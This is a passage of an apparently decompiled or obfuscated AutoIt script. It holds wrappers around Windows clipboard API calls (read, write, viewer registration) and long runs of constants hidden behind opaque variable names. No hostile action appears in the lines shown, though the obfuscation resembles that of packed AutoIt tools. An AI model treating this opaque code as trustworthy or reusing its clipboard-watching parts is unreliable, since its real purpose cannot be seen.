  2432. LOCAL $Local0074 =Fn00F2($ArgOpt00)
  2433. IF $Local0074 = 0 THEN
  2434. Fn00EC()
  2435. RETURN SETERROR(- 3 , 0 , 0 )
  2436. ENDIF
  2437. LOCAL $Local0075 =Fn00DF($Local0074 )
  2438. IF $Local0075 = 0 THEN
  2439. Fn00EC()
  2440. RETURN SETERROR(- 4 , 0 , 0 )
  2441. ENDIF
  2442. LOCAL $Local0076 =Fn00E0($Local0074 )
  2443. IF $Local0076 = 0 THEN
  2444. Fn00E1($Local0074 )
  2445. Fn00EC()
  2446. RETURN SETERROR(- 5 , 0 ,"")
  2447. ENDIF
  2448. LOCAL $Local0078
  2449. SWITCH $ArgOpt00
  2450. CASE $Var01C2 ,$Var01CE
  2451. $Local0078 =DLLSTRUCTCREATE("char[" &$Local0076 &"]" ,$Local0075 )
  2452. CASE $Var01DA
  2453. $Local0076 =ROUND($Local0076 / 2 )
  2454. $Local0078 =DLLSTRUCTCREATE("wchar[" &$Local0076 &"]" ,$Local0075 )
  2455. CASE ELSE
  2456. $Local0078 =DLLSTRUCTCREATE("byte[" &$Local0076 &"]" ,$Local0075 )
  2457. ENDSWITCH
  2458. LOCAL $Local0077 =DLLSTRUCTGETDATA($Local0078 , 1 )
  2459. Fn00E1($Local0074 )
  2460. Fn00EC()
  2461. RETURN SETEXTENDED($Local0076 ,$Local0077 )
  2462. ENDFUNC
  2463.  
  2464. Func Fn00F2($ArgOpt00=1)
  2465. LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"GetClipboardData","uint" ,$ArgOpt00)
  2466. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2467. RETURN $Local000E [ 0 ]
  2468. ENDFUNC
  2469.  
  2470. Func Fn00F3($Arg00)
  2471. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetClipboardFormatNameW","uint" ,$Arg00,"wstr" ,"","int" ,0x1000 )
  2472. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,"")
  2473. RETURN $Local000E [ 2 ]
  2474. ENDFUNC
  2475.  
  2476. Func Fn00F4()
  2477. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetOpenClipboardWindow")
  2478. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2479. RETURN $Local000E [ 0 ]
  2480. ENDFUNC
  2481.  
  2482. Func Fn00F5()
  2483. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetClipboardOwner")
  2484. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2485. RETURN $Local000E [ 0 ]
  2486. ENDFUNC
  2487.  
  2488. Func Fn00F6($Arg00)
  2489. IF NOT ISARRAY($Arg00)THEN RETURN SETERROR(- 1 , 0 , 0 )
  2490. IF $Arg00[ 0 ]<= 0 THEN RETURN SETERROR(- 2 , 0 , 0 )
  2491. LOCAL $Local0078 =DLLSTRUCTCREATE("uint[" &$Arg00[ 0 ]&"]" )
  2492. FOR $Var014F = 1 TO $Arg00[ 0 ]
  2493. DLLSTRUCTSETDATA($Local0078 , 1 ,$Arg00[$Var014F ],$Var014F )
  2494. NEXT
  2495. LOCAL $Local000E =DLLCALL("user32.dll","int" ,"GetPriorityClipboardFormat","struct*" ,$Local0078 ,"int" ,$Arg00[ 0 ])
  2496. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2497. RETURN $Local000E [ 0 ]
  2498. ENDFUNC
  2499.  
  2500. Func Fn00F7()
  2501. LOCAL $Local000E =DLLCALL("user32.dll","dword" ,"GetClipboardSequenceNumber")
  2502. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2503. RETURN $Local000E [ 0 ]
  2504. ENDFUNC
  2505.  
  2506. Func Fn00F8()
  2507. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"GetClipboardViewer")
  2508. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2509. RETURN $Local000E [ 0 ]
  2510. ENDFUNC
  2511.  
  2512. Func Fn00F9($Arg00)
  2513. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"IsClipboardFormatAvailable","uint" ,$Arg00)
  2514. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  2515. RETURN $Local000E [ 0 ]
  2516. ENDFUNC
  2517.  
  2518. Func Fn00FA($Arg00)
  2519. LOCAL $Local000E =DLLCALL("user32.dll","bool" ,"OpenClipboard","hwnd" ,$Arg00)
  2520. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED,FALSE )
  2521. RETURN $Local000E [ 0 ]
  2522. ENDFUNC
  2523.  
  2524. Func Fn00FB($Arg00)
  2525. LOCAL $Local000E =DLLCALL("user32.dll","uint" ,"RegisterClipboardFormatW","wstr" ,$Arg00)
  2526. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2527. RETURN $Local000E [ 0 ]
  2528. ENDFUNC
  2529.  
  2530. Func Fn00FC($Arg00,$ArgOpt01=1)
  2531. LOCAL $Local0078 ,$Local0089 ,$Local0074 ,$Local003F
  2532. IF ISNUMBER($Arg00)AND $Arg00= 0 THEN
  2533. $Local0074 =$Arg00
  2534. ELSE
  2535. IF ISBINARY($Arg00)THEN
  2536. $Local003F =BINARYLEN($Arg00)
  2537. ELSEIF ISSTRING($Arg00)THEN
  2538. $Local003F =STRINGLEN($Arg00)
  2539. ELSE
  2540. RETURN SETERROR( 2 , 0 , 0 )
  2541. ENDIF
  2542. $Local003F += 1
  2543. IF $ArgOpt01=$Var01DA THEN
  2544. $Local0074 =Fn00DD($Local003F * 2 ,$Var0189 )
  2545. ELSE
  2546. $Local0074 =Fn00DD($Local003F ,$Var0189 )
  2547. ENDIF
  2548. IF $Local0074 = 0 THEN RETURN SETERROR(- 1 , 0 , 0 )
  2549. $Local0089 =Fn00DF($Local0074 )
  2550. IF $Local0089 = 0 THEN RETURN SETERROR(- 2 , 0 , 0 )
  2551. SWITCH $ArgOpt01
  2552. CASE $Var01C2 ,$Var01CE
  2553. $Local0078 =DLLSTRUCTCREATE("char[" &$Local003F &"]" ,$Local0089 )
  2554. CASE $Var01DA
  2555. $Local0078 =DLLSTRUCTCREATE("wchar[" &$Local003F &"]" ,$Local0089 )
  2556. CASE ELSE
  2557. $Local0078 =DLLSTRUCTCREATE("byte[" &$Local003F &"]" ,$Local0089 )
  2558. ENDSWITCH
  2559. DLLSTRUCTSETDATA($Local0078 , 1 ,$Arg00)
  2560. Fn00E1($Local0074 )
  2561. ENDIF
  2562. IF NOT Fn00FA( 0 )THEN RETURN SETERROR(- 5 , 0 , 0 )
  2563. IF NOT Fn00EE()THEN RETURN SETERROR(- 6 , 0 , 0 )
  2564. IF NOT Fn00FD($Local0074 ,$ArgOpt01)THEN
  2565. Fn00EC()
  2566. RETURN SETERROR(- 7 , 0 , 0 )
  2567. ENDIF
  2568. Fn00EC()
  2569. RETURN $Local0074
  2570. ENDFUNC
  2571.  
  2572. Func Fn00FD(BYREF $ArgRef00,$ArgOpt01=1)
  2573. LOCAL $Local000E =DLLCALL("user32.dll","handle" ,"SetClipboardData","uint" ,$ArgOpt01,"handle" ,$ArgRef00)
  2574. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2575. RETURN $Local000E [ 0 ]
  2576. ENDFUNC
  2577.  
  2578. Func Fn00FE($Arg00)
  2579. LOCAL $Local000E =DLLCALL("user32.dll","hwnd" ,"SetClipboardViewer","hwnd" ,$Arg00)
  2580. IF @ERROR THEN RETURN SETERROR(@ERROR,@EXTENDED, 0 )
  2581. RETURN $Local000E [ 0 ]
  2582. ENDFUNC
  2583. GLOBAL CONST $Var01F6 =NUMBER($Var01F7 )
  2584. GLOBAL CONST $Var01F8 =$Var01F6 +NUMBER($Var01F9 )
  2585. GLOBAL CONST $Var01FA =$Var01F6 +NUMBER($Var01FB )
  2586. GLOBAL CONST $Var01FC =$Var01F6 +NUMBER($Var01FD )
  2587. GLOBAL CONST $Var01FE =$Var01F6 +NUMBER($Var01FF )
  2588. GLOBAL CONST $Var0200 =$Var01F6 +NUMBER($Var0201 )
  2589. GLOBAL CONST $Var0202 =$Var01F6 +NUMBER($Var0203 )
  2590. GLOBAL CONST $Var0204 =$Var01F6 +NUMBER($Var0205 )
  2591. GLOBAL CONST $Var0206 =$Var01F6 +NUMBER($Var0207 )
  2592. GLOBAL CONST $Var0208 =$Var01F6 +NUMBER($Var0209 )
  2593. GLOBAL CONST $Var020A =$Var01F6 +NUMBER($Var020B )
  2594. GLOBAL CONST $Var020C =$Var01F6 +NUMBER($Var020D )
  2595. GLOBAL CONST $Var020E =$Var01F6 +NUMBER($Var020F )
  2596. GLOBAL CONST $Var0210 =$Var01F6 +NUMBER($Var0211 )
  2597. GLOBAL CONST $Var0212 =$Var01F6 +NUMBER($Var0213 )
  2598. GLOBAL CONST $Var0214 =$Var01F6 +NUMBER($Var0215 )
  2599. GLOBAL CONST $Var0216 =$Var01F6 +NUMBER($Var0217 )
  2600. GLOBAL CONST $Var0218 =$Var01F6 +NUMBER($Var0219 )
  2601. GLOBAL CONST $Var021A =$Var01F6 +NUMBER($Var021B )
  2602. GLOBAL CONST $Var021C =$Var01F6 +NUMBER($Var021D )
  2603. GLOBAL CONST $Var021E =$Var01F6 +NUMBER($Var021F )
  2604. GLOBAL CONST $Var0220 =$Var01F6 +NUMBER($Var0221 )
  2605. GLOBAL CONST $Var0222 =$Var01F6 +NUMBER($Var0223 )
  2606. GLOBAL CONST $Var0224 =$Var01F6 +NUMBER($Var0225 )
  2607. GLOBAL CONST $Var0226 =$Var01F6 +NUMBER($Var0227 )
  2608. GLOBAL CONST $Var0228 =$Var01F6 +NUMBER($Var0229 )
  2609. GLOBAL CONST $Var022A =$Var01F6 +NUMBER($Var022B )
  2610. GLOBAL CONST $Var022C =$Var01F6 +NUMBER($Var022D )
  2611. GLOBAL CONST $Var022E =$Var01F6 +NUMBER($Var022F )
  2612. GLOBAL CONST $Var0230 =$Var01F6 +NUMBER($Var0231 )
  2613. GLOBAL CONST $Var0232 =$Var01F6 +NUMBER($Var0233 )
  2614. GLOBAL CONST $Var0234 =$Var01F6 +NUMBER($Var0235 )
  2615. GLOBAL CONST $Var0236 =$Var01F6 +NUMBER($Var0237 )
  2616. GLOBAL CONST $Var0238 =$Var01F6 +NUMBER($Var0239 )
  2617. GLOBAL CONST $Var023A =$Var01F6 +NUMBER($Var023B )
  2618. GLOBAL CONST $Var023C =$Var01F6 +NUMBER($Var023D )
  2619. GLOBAL CONST $Var023E =$Var01F6 +NUMBER($Var023F )
  2620. GLOBAL CONST $Var0240 =$Var01F6 +NUMBER($Var0241 )
  2621. GLOBAL CONST $Var0242 =$Var01F6 +NUMBER($Var0243 )
  2622. GLOBAL CONST $Var0244 =$Var01F6 +NUMBER($Var0245 )
  2623. GLOBAL CONST $Var0246 =$Var01F6 +NUMBER($Var0247 )
  2624. GLOBAL CONST $Var0248 =$Var01F6 +NUMBER($Var0249 )
  2625. GLOBAL CONST $Var024A =$Var01F6 +NUMBER($Var024B )
  2626. GLOBAL CONST $Var024C =$Var01F6 +NUMBER($Var024D )
  2627. GLOBAL CONST $Var024E =$Var01F6 +NUMBER($Var024F )
  2628. GLOBAL CONST $Var0250 =$Var01F6 +NUMBER($Var0251 )
  2629. GLOBAL CONST $Var0252 =$Var01F6 +NUMBER($Var0253 )
  2630. GLOBAL CONST $Var0254 =$Var01F6 +NUMBER($Var0255 )
  2631. GLOBAL CONST $Var0256 =$Var01F6 +NUMBER($Var0257 )
  2632. GLOBAL CONST $Var0258 =$Var01F6 +NUMBER($Var0259 )
  2633. GLOBAL CONST $Var025A =$Var01F6 +NUMBER($Var025B )
  2634. GLOBAL CONST $Var025C =$Var01F6 +NUMBER($Var025D )
  2635. GLOBAL CONST $Var025E =$Var01F6 +NUMBER($Var025F )
  2636. GLOBAL CONST $Var0260 =$Var01F6 +NUMBER($Var0261 )
  2637. GLOBAL CONST $Var0262 =$Var01F6 +NUMBER($Var0263 )
  2638. GLOBAL CONST $Var0264 =$Var01F6 +NUMBER($Var0265 )
  2639. GLOBAL CONST $Var0266 =$Var01F6 +NUMBER($Var0267 )
  2640. GLOBAL CONST $Var0268 =$Var01F6 +NUMBER($Var0269 )
  2641. GLOBAL CONST $Var026A =$Var01F6 +NUMBER($Var026B )
  2642. GLOBAL CONST $Var026C =$Var01F6 +NUMBER($Var026D )
  2643. GLOBAL CONST $Var026E =$Var01F6 +NUMBER($Var026F )
  2644. GLOBAL CONST $Var0270 =$Var01F6 +NUMBER($Var0271 )
  2645. GLOBAL CONST $Var0272 =$Var01F6 +NUMBER($Var0273 )
  2646. GLOBAL CONST $Var0274 =$Var01F6 +NUMBER($Var0275 )
  2647. GLOBAL CONST $Var0276 =$Var01F6 +NUMBER($Var0277 )
  2648. GLOBAL CONST $Var0278 =$Var01F6 +NUMBER($Var0279 )
  2649. GLOBAL CONST $Var027A =$Var01F6 +NUMBER($Var027B )
  2650. GLOBAL CONST $Var027C =$Var01F6 +NUMBER($Var027D )
  2651. GLOBAL CONST $Var027E =$Var01F6 +NUMBER($Var027F )
  2652. GLOBAL CONST $Var0280 =$Var01F6 +NUMBER($Var0281 )
  2653. GLOBAL CONST $Var0282 =$Var01F6 +NUMBER($Var0283 )
  2654. GLOBAL CONST $Var0284 =$Var01F6 +NUMBER($Var0285 )
  2655. GLOBAL CONST $Var0286 =$Var01F6 +NUMBER($Var0287 )
  2656. GLOBAL CONST $Var0288 =$Var01F6 +NUMBER($Var0289 )
  2657. GLOBAL CONST $Var028A =NUMBER($Var028B )
  2658. GLOBAL CONST $Var028C =NUMBER($Var028D )
  2659. GLOBAL CONST $Var028E =NUMBER($Var028F )
  2660. GLOBAL CONST $Var0290 =NUMBER($Var0291 )
  2661. GLOBAL CONST $Var0292 =NUMBER($Var0293 )
  2662. GLOBAL CONST $Var0294 =NUMBER($Var0295 )
  2663. GLOBAL CONST $Var0296 =NUMBER($Var0297 )
  2664. GLOBAL CONST $Var0298 =NUMBER($Var0299 )
  2665. GLOBAL CONST $Var029A =NUMBER($Var029B )
  2666. GLOBAL CONST $Var029C =NUMBER($Var029D )
  2667. GLOBAL CONST $Var029E =NUMBER($Var029F )
  2668. GLOBAL CONST $Var02A0 =NUMBER($Var02A1 )
  2669. GLOBAL CONST $Var02A2 =NUMBER($Var02A3 )
  2670. GLOBAL CONST $Var02A4 =NUMBER($Var02A5 )
  2671. GLOBAL CONST $Var02A6 =NUMBER($Var02A7 )
  2672. GLOBAL CONST $Var02A8 =NUMBER($Var02A9 )
  2673. GLOBAL CONST $Var02AA =NUMBER($Var02AB )
  2674. GLOBAL CONST $Var02AC =NUMBER($Var02AD )
  2675. GLOBAL CONST $Var02AE =NUMBER($Var02AF )
  2676. GLOBAL CONST $Var02B0 =NUMBER($Var02B1 )
  2677. GLOBAL CONST $Var02B2 =NUMBER($Var02B3 )
  2678. GLOBAL CONST $Var02B4 =NUMBER($Var02B5 )
  2679. GLOBAL CONST $Var02B6 =NUMBER($Var02B7 )
  2680. GLOBAL CONST $Var02B8 =NUMBER($Var02B9 )
  2681. GLOBAL CONST $Var02BA =NUMBER($Var02BB )
  2682. GLOBAL CONST $Var02BC =NUMBER($Var02BD )
  2683. GLOBAL CONST $Var02BE =NUMBER($Var02BF )
  2684. GLOBAL CONST $Var02C0 =NUMBER($Var02C1 )
  2685. GLOBAL CONST $Var02C2 =NUMBER($Var02C3 )
  2686. GLOBAL CONST $Var02C4 =NUMBER($Var02C5 )
  2687. GLOBAL CONST $Var02C6 =NUMBER($Var02C7 )
  2688. GLOBAL CONST $Var02C8 =NUMBER($Var02C9 )
  2689. GLOBAL CONST $Var02CA =NUMBER($Var02CB )
  2690. GLOBAL CONST $Var02CC =NUMBER($Var02CD )
  2691. GLOBAL CONST $Var02CE =NUMBER($Var02CF )
  2692. GLOBAL CONST $Var02D0 =NUMBER($Var02D1 )
  2693. GLOBAL CONST $Var02D2 =NUMBER($Var02D3 )
  2694. GLOBAL CONST $Var02D4 =NUMBER($Var02D5 )
  2695. GLOBAL CONST $Var02D6 =NUMBER($Var02D7 )
  2696. GLOBAL CONST $Var02D8 =NUMBER($Var02D9 )
  2697. GLOBAL CONST $Var02DA =NUMBER($Var02DB )
  2698. GLOBAL CONST $Var02DC =NUMBER($Var02DD )
  2699. GLOBAL CONST $Var02DE =NUMBER($Var02DF )
  2700. GLOBAL CONST $Var02E0 =NUMBER($Var02E1 )
  2701. GLOBAL CONST $Var02E2 =NUMBER($Var02E3 )
  2702. GLOBAL CONST $Var02E4 =NUMBER($Var02E5 )
  2703. GLOBAL CONST $Var02E6 =NUMBER($Var02E7 )
  2704. GLOBAL CONST $Var02E8 =NUMBER($Var02E9 )
  2705. GLOBAL CONST $Var02EA =NUMBER($Var02EB )
  2706. GLOBAL CONST $Var02EC =NUMBER($Var02ED )
  2707. GLOBAL CONST $Var02EE =NUMBER($Var02EF )
  2708. GLOBAL CONST $Var02F0 =NUMBER($Var02F1 )
  2709. GLOBAL CONST $Var02F2 =NUMBER($Var02F3 )
  2710. GLOBAL CONST $Var02F4 =NUMBER($Var02F5 )
  2711. GLOBAL CONST $Var02F6 =NUMBER($Var02F7 )
  2712. GLOBAL CONST $Var02F8 =NUMBER($Var02F9 )
  2713. GLOBAL CONST $Var02FA =NUMBER($Var02FB )
  2714. GLOBAL CONST $Var02FC =NUMBER($Var02FD )
  2715. GLOBAL CONST $Var02FE =NUMBER($Var02FF )
  2716. GLOBAL CONST $Var0300 =NUMBER($Var0301 )
  2717. GLOBAL CONST $Var0302 =NUMBER($Var0303 )
  2718. GLOBAL CONST $Var0304 =NUMBER($Var0305 )
  2719. GLOBAL CONST $Var0306 =NUMBER($Var0307 )
  2720. GLOBAL CONST $Var0308 =NUMBER($Var0309 )
  2721. GLOBAL CONST $Var030A =NUMBER($Var030B )
  2722. GLOBAL CONST $Var030C =NUMBER($Var030D )
  2723. GLOBAL CONST $Var030E =NUMBER($Var030F )
  2724. GLOBAL CONST $Var0310 =NUMBER($Var0311 )
  2725. GLOBAL CONST $Var0312 =NUMBER($Var0313 )
  2726. GLOBAL CONST $Var0314 =NUMBER($Var0315 )
  2727. GLOBAL CONST $Var0316 =NUMBER($Var0317 )
  2728. GLOBAL CONST $Var0318 =NUMBER($Var0319 )
  2729. GLOBAL CONST $Var031A =NUMBER($Var031B )
  2730. GLOBAL CONST $Var031C =NUMBER($Var031D )
  2731. GLOBAL CONST $Var031E =NUMBER($Var031F )
  2732. GLOBAL CONST $Var0320 =NUMBER($Var0321 )
  2733. GLOBAL CONST $Var0322 =NUMBER($Var0323 )
  2734. GLOBAL CONST $Var0324 =NUMBER($Var0325 )
  2735. GLOBAL CONST $Var0326 =NUMBER($Var0327 )
  2736. GLOBAL CONST $Var0328 =NUMBER($Var0329 )
  2737. GLOBAL CONST $Var032A =NUMBER($Var032B )
  2738. GLOBAL CONST $Var032C =NUMBER($Var032D )
  2739. GLOBAL CONST $Var032E =NUMBER($Var032F )
  2740. GLOBAL CONST $Var0330 =NUMBER($Var0331 )
  2741. GLOBAL CONST $Var0332 =NUMBER($Var0333 )
  2742. GLOBAL CONST $Var0334 =NUMBER($Var0335 )
  2743. GLOBAL CONST $Var0336 =NUMBER($Var0337 )
  2744. GLOBAL CONST $Var0338 =NUMBER($Var0339 )
  2745. GLOBAL CONST $Var033A =NUMBER($Var033B )
  2746. GLOBAL CONST $Var033C =BITOR($Var0304 ,$Var0306 )
  2747. GLOBAL CONST $Var033D =$Var033C
  2748. GLOBAL CONST $Var033E =NUMBER($Var033F )
  2749. GLOBAL CONST $Var0340 =NUMBER($Var0341 )
  2750. GLOBAL CONST $Var0342 =NUMBER($Var0343 )
  2751. GLOBAL CONST $Var0344 =$Var0308
  2752. GLOBAL CONST $Var0345 =$Var030C
  2753. GLOBAL CONST $Var0346 =$Var0312
  2754. GLOBAL CONST $Var0347 =$Var030E
  2755. GLOBAL CONST $Var0348 =$Var0314
  2756. GLOBAL CONST $Var0349 =$Var0316
  2757. GLOBAL CONST $Var034A =$Var031A
  2758. GLOBAL CONST $Var034B =$Var031C
  2759. GLOBAL CONST $Var034C =$Var031E
  2760. GLOBAL CONST $Var034D =$Var0324
  2761. GLOBAL CONST $Var034E =$Var0328
  2762. GLOBAL CONST $Var034F =$Var032A
  2763. GLOBAL CONST $Var0350 =$Var032E
  2764. GLOBAL CONST $Var0351 =$Var0330
  2765. GLOBAL CONST $Var0352 =$Var0334
  2766. GLOBAL CONST $Var0353 =$Var0338
  2767. GLOBAL CONST $Var0354 =$Var033E
  2768. GLOBAL CONST $Var0355 =NUMBER($Var0356 )
  2769. GLOBAL CONST $Var0357 =NUMBER($Var0358 )
  2770. GLOBAL CONST $Var0359 =NUMBER($Var035A )
  2771. GLOBAL CONST $Var035B =NUMBER($Var035C )
  2772. GLOBAL CONST $Var035D =NUMBER($Var035E )
  2773. GLOBAL CONST $Var035F =NUMBER($Var0360 )
  2774. GLOBAL CONST $Var0361 =$Var035F
  2775. GLOBAL CONST $Var0362 =NUMBER($Var0363 )
  2776. GLOBAL CONST $Var0364 =NUMBER($Var0365 )
  2777. GLOBAL CONST $Var0366 =NUMBER($Var0367 )
  2778. GLOBAL CONST $Var0368 =NUMBER($Var0369 )
  2779. GLOBAL CONST $Var036A =NUMBER($Var036B )
  2780. GLOBAL CONST $Var036C =NUMBER($Var036D )
  2781. GLOBAL CONST $Var036E =NUMBER($Var036F )
  2782. GLOBAL CONST $Var0370 =NUMBER($Var0371 )
  2783. GLOBAL CONST $Var0372 =NUMBER($Var0373 )
  2784. GLOBAL CONST $Var0374 =NUMBER($Var0375 )
  2785. GLOBAL CONST $Var0376 =NUMBER($Var0377 )
  2786. GLOBAL CONST $Var0378 =NUMBER($Var0379 )
  2787. GLOBAL CONST $Var037A =NUMBER($Var037B )
  2788. GLOBAL CONST $Var037C =NUMBER($Var037D )
  2789. GLOBAL CONST $Var037E =NUMBER($Var037F )
  2790. GLOBAL CONST $Var0380 =NUMBER($Var0381 )
  2791. GLOBAL CONST $Var0382 =NUMBER($Var0383 )
  2792. GLOBAL CONST $Var0384 =NUMBER($Var0385 )
  2793. GLOBAL CONST $Var0386 =NUMBER($Var0387 )
  2794. GLOBAL CONST $Var0388 =NUMBER($Var0389 )
  2795. GLOBAL CONST $Var038A =NUMBER($Var038B )
  2796. GLOBAL CONST $Var038C =NUMBER($Var038D )
  2797. GLOBAL CONST $Var038E =NUMBER($Var038F )
  2798. GLOBAL CONST $Var0390 =NUMBER($Var0391 )
  2799. GLOBAL CONST $Var0392 =NUMBER($Var0393 )
  2800. GLOBAL CONST $Var0394 =NUMBER($Var0395 )
  2801. GLOBAL CONST $Var0396 =NUMBER($Var0397 )
  2802. GLOBAL CONST $Var0398 =NUMBER($Var0399 )
  2803. GLOBAL CONST $Var039A =NUMBER($Var039B )
  2804. GLOBAL CONST $Var039C =NUMBER($Var039D )
  2805. GLOBAL CONST $Var039E =NUMBER($Var039F )
  2806. GLOBAL CONST $Var03A0 =NUMBER($Var03A1 )
  2807. GLOBAL CONST $Var03A2 =NUMBER($Var03A3 )
  2808. GLOBAL CONST $Var03A4 =NUMBER($Var03A5 )
  2809. GLOBAL CONST $Var03A6 =NUMBER($Var03A7 )
  2810. GLOBAL CONST $Var03A8 =NUMBER($Var03A9 )
  2811. GLOBAL CONST $Var03AA =NUMBER($Var03AB )
  2812. GLOBAL CONST $Var03AC =NUMBER($Var03AD )
  2813. GLOBAL CONST $Var03AE =NUMBER($Var03AF )
  2814. GLOBAL CONST $Var03B0 =NUMBER($Var03B1 )
  2815. GLOBAL CONST $Var03B2 =NUMBER($Var03B3 )
  2816. GLOBAL CONST $Var03B4 =NUMBER($Var03B5 )
  2817. GLOBAL CONST $Var03B6 =NUMBER($Var03B7 )
  2818. GLOBAL CONST $Var03B8 =NUMBER($Var03B9 )
  2819. GLOBAL CONST $Var03BA =NUMBER($Var03BB )
  2820. GLOBAL CONST $Var03BC =NUMBER($Var03BD )
  2821. GLOBAL CONST $Var03BE =NUMBER($Var03BF )
  2822. GLOBAL CONST $Var03C0 =NUMBER($Var03C1 )
  2823. GLOBAL CONST $Var03C2 =NUMBER($Var03C3 )
  2824. GLOBAL CONST $Var03C4 =NUMBER($Var03C5 )
  2825. GLOBAL CONST $Var03C6 =NUMBER($Var03C7 )
  2826. GLOBAL CONST $Var03C8 =NUMBER($Var03C9 )
  2827. GLOBAL CONST $Var03CA =BITSHIFT($Var03BA ,NUMBER($Var03CB ))
  2828. GLOBAL CONST $Var03CC =BITSHIFT($Var03BC ,NUMBER($Var03CD ))
  2829. GLOBAL CONST $Var03CE =BITSHIFT($Var03BE ,NUMBER($Var03CF ))
  2830. GLOBAL CONST $Var03D0 =BITSHIFT($Var03C0 ,NUMBER($Var03D1 ))
  2831. GLOBAL CONST $Var03D2 =BITSHIFT($Var03C2 ,NUMBER($Var03D3 ))
  2832. GLOBAL CONST $Var03D4 =BITSHIFT($Var03C4 ,NUMBER($Var03D5 ))
  2833. GLOBAL CONST $Var03D6 =BITSHIFT($Var03C6 ,NUMBER($Var03D7 ))
  2834. GLOBAL CONST $Var03D8 =BITSHIFT($Var03C8 ,NUMBER($Var03D9 ))
  2835. GLOBAL CONST $Var03DA =NUMBER($Var03DB )
  2836. GLOBAL CONST $Var03DC =NUMBER($Var03DD )
  2837. GLOBAL CONST $Var03DE =NUMBER($Var03DF )
  2838. GLOBAL CONST $Var03E0 =NUMBER($Var03E1 )
  2839. GLOBAL CONST $Var03E2 =NUMBER($Var03E3 )
  2840. GLOBAL CONST $Var03E4 =NUMBER($Var03E5 )
  2841. GLOBAL CONST $Var03E6 =NUMBER($Var03E7 )
  2842. GLOBAL CONST $Var03E8 =NUMBER($Var03E9 )
  2843. GLOBAL CONST $Var03EA =NUMBER($Var03EB )
  2844. GLOBAL CONST $Var03EC =NUMBER($Var03ED )
  2845. GLOBAL CONST $Var03EE =NUMBER($Var03EF )
  2846. GLOBAL CONST $Var03F0 =NUMBER($Var03F1 )
  2847. GLOBAL CONST $Var03F2 =NUMBER($Var03F3 )
  2848. GLOBAL CONST $Var03F4 =NUMBER($Var03F5 )
  2849. GLOBAL CONST $Var03F6 =NUMBER($Var03F7 )
  2850. GLOBAL CONST $Var03F8 =NUMBER($Var03F9 )
  2851. GLOBAL CONST $Var03FA =NUMBER($Var03FB )
  2852. GLOBAL CONST $Var03FC =NUMBER($Var03FD )
  2853. GLOBAL CONST $Var03FE =NUMBER($Var03FF )
  2854. GLOBAL CONST $Var0400 =NUMBER($Var0401 )
  2855. GLOBAL CONST $Var0402 =NUMBER($Var0403 )
  2856. GLOBAL CONST $Var0404 =NUMBER($Var0405 )
  2857. GLOBAL CONST $Var0406 =NUMBER($Var0407 )
  2858. GLOBAL CONST $Var0408 =NUMBER($Var0409 )
  2859. GLOBAL CONST $Var040A =NUMBER($Var040B )
  2860. GLOBAL CONST $Var040C =NUMBER($Var040D )
  2861. GLOBAL CONST $Var040E =NUMBER($Var040F )
  2862. GLOBAL CONST $Var0410 =NUMBER($Var0411 )
  2863. GLOBAL CONST $Var0412 =NUMBER($Var0413 )
  2864. GLOBAL CONST $Var0414 =NUMBER($Var0415 )
  2865. GLOBAL CONST $Var0416 =NUMBER($Var0417 )
  2866. GLOBAL CONST $Var0418 =NUMBER($Var0419 )
  2867. GLOBAL CONST $Var041A =NUMBER($Var041B )
  2868. GLOBAL CONST $Var041C =NUMBER($Var041D )
  2869. GLOBAL CONST $Var041E =NUMBER($Var041F )
  2870. GLOBAL CONST $Var0420 =NUMBER($Var0421 )
  2871. GLOBAL CONST $Var0422 =NUMBER($Var0423 )
  2872. GLOBAL CONST $Var0424 =NUMBER($Var0425 )
  2873. GLOBAL CONST $Var0426 =NUMBER($Var0427 )
  2874. GLOBAL CONST $Var0428 =NUMBER($Var0429 )
  2875. GLOBAL CONST $Var042A =NUMBER($Var042B )
  2876. GLOBAL CONST $Var042C =NUMBER($Var042D )
  2877. GLOBAL CONST $Var042E =NUMBER($Var042F )
  2878. GLOBAL CONST $Var0430 =NUMBER($Var0431 )
  2879. GLOBAL CONST $Var0432 =NUMBER($Var0433 )
  2880. GLOBAL CONST $Var0434 =NUMBER($Var0435 )
  2881. GLOBAL CONST $Var0436 =NUMBER($Var0437 )
  2882. GLOBAL CONST $Var0438 =NUMBER($Var0439 )
  2883. GLOBAL CONST $Var043A =NUMBER($Var043B )
  2884. GLOBAL CONST $Var043C =NUMBER($Var043D )
  2885. GLOBAL CONST $Var043E =NUMBER($Var043F )
  2886. GLOBAL CONST $Var0440 =NUMBER($Var0441 )
  2887. GLOBAL CONST $Var0442 =NUMBER($Var0443 )
  2888. GLOBAL CONST $Var0444 =NUMBER($Var0445 )
  2889. GLOBAL CONST $Var0446 =NUMBER($Var0447 )
  2890. GLOBAL CONST $Var0448 =NUMBER($Var0449 )
  2891. GLOBAL CONST $Var044A =NUMBER($Var044B )
  2892. GLOBAL CONST $Var044C =NUMBER($Var044D )
  2893. GLOBAL CONST $Var044E =NUMBER($Var044F )
  2894. GLOBAL CONST $Var0450 =NUMBER($Var0451 )
  2895. GLOBAL CONST $Var0452 =NUMBER($Var0453 )
  2896. GLOBAL CONST $Var0454 =NUMBER($Var0455 )
  2897. GLOBAL CONST $Var0456 =NUMBER($Var0457 )
  2898. GLOBAL CONST $Var0458 =NUMBER($Var0459 )
  2899. GLOBAL CONST $Var045A =NUMBER($Var045B )
  2900. GLOBAL CONST $Var045C =NUMBER($Var045D )
  2901. GLOBAL CONST $Var045E =NUMBER($Var045F )
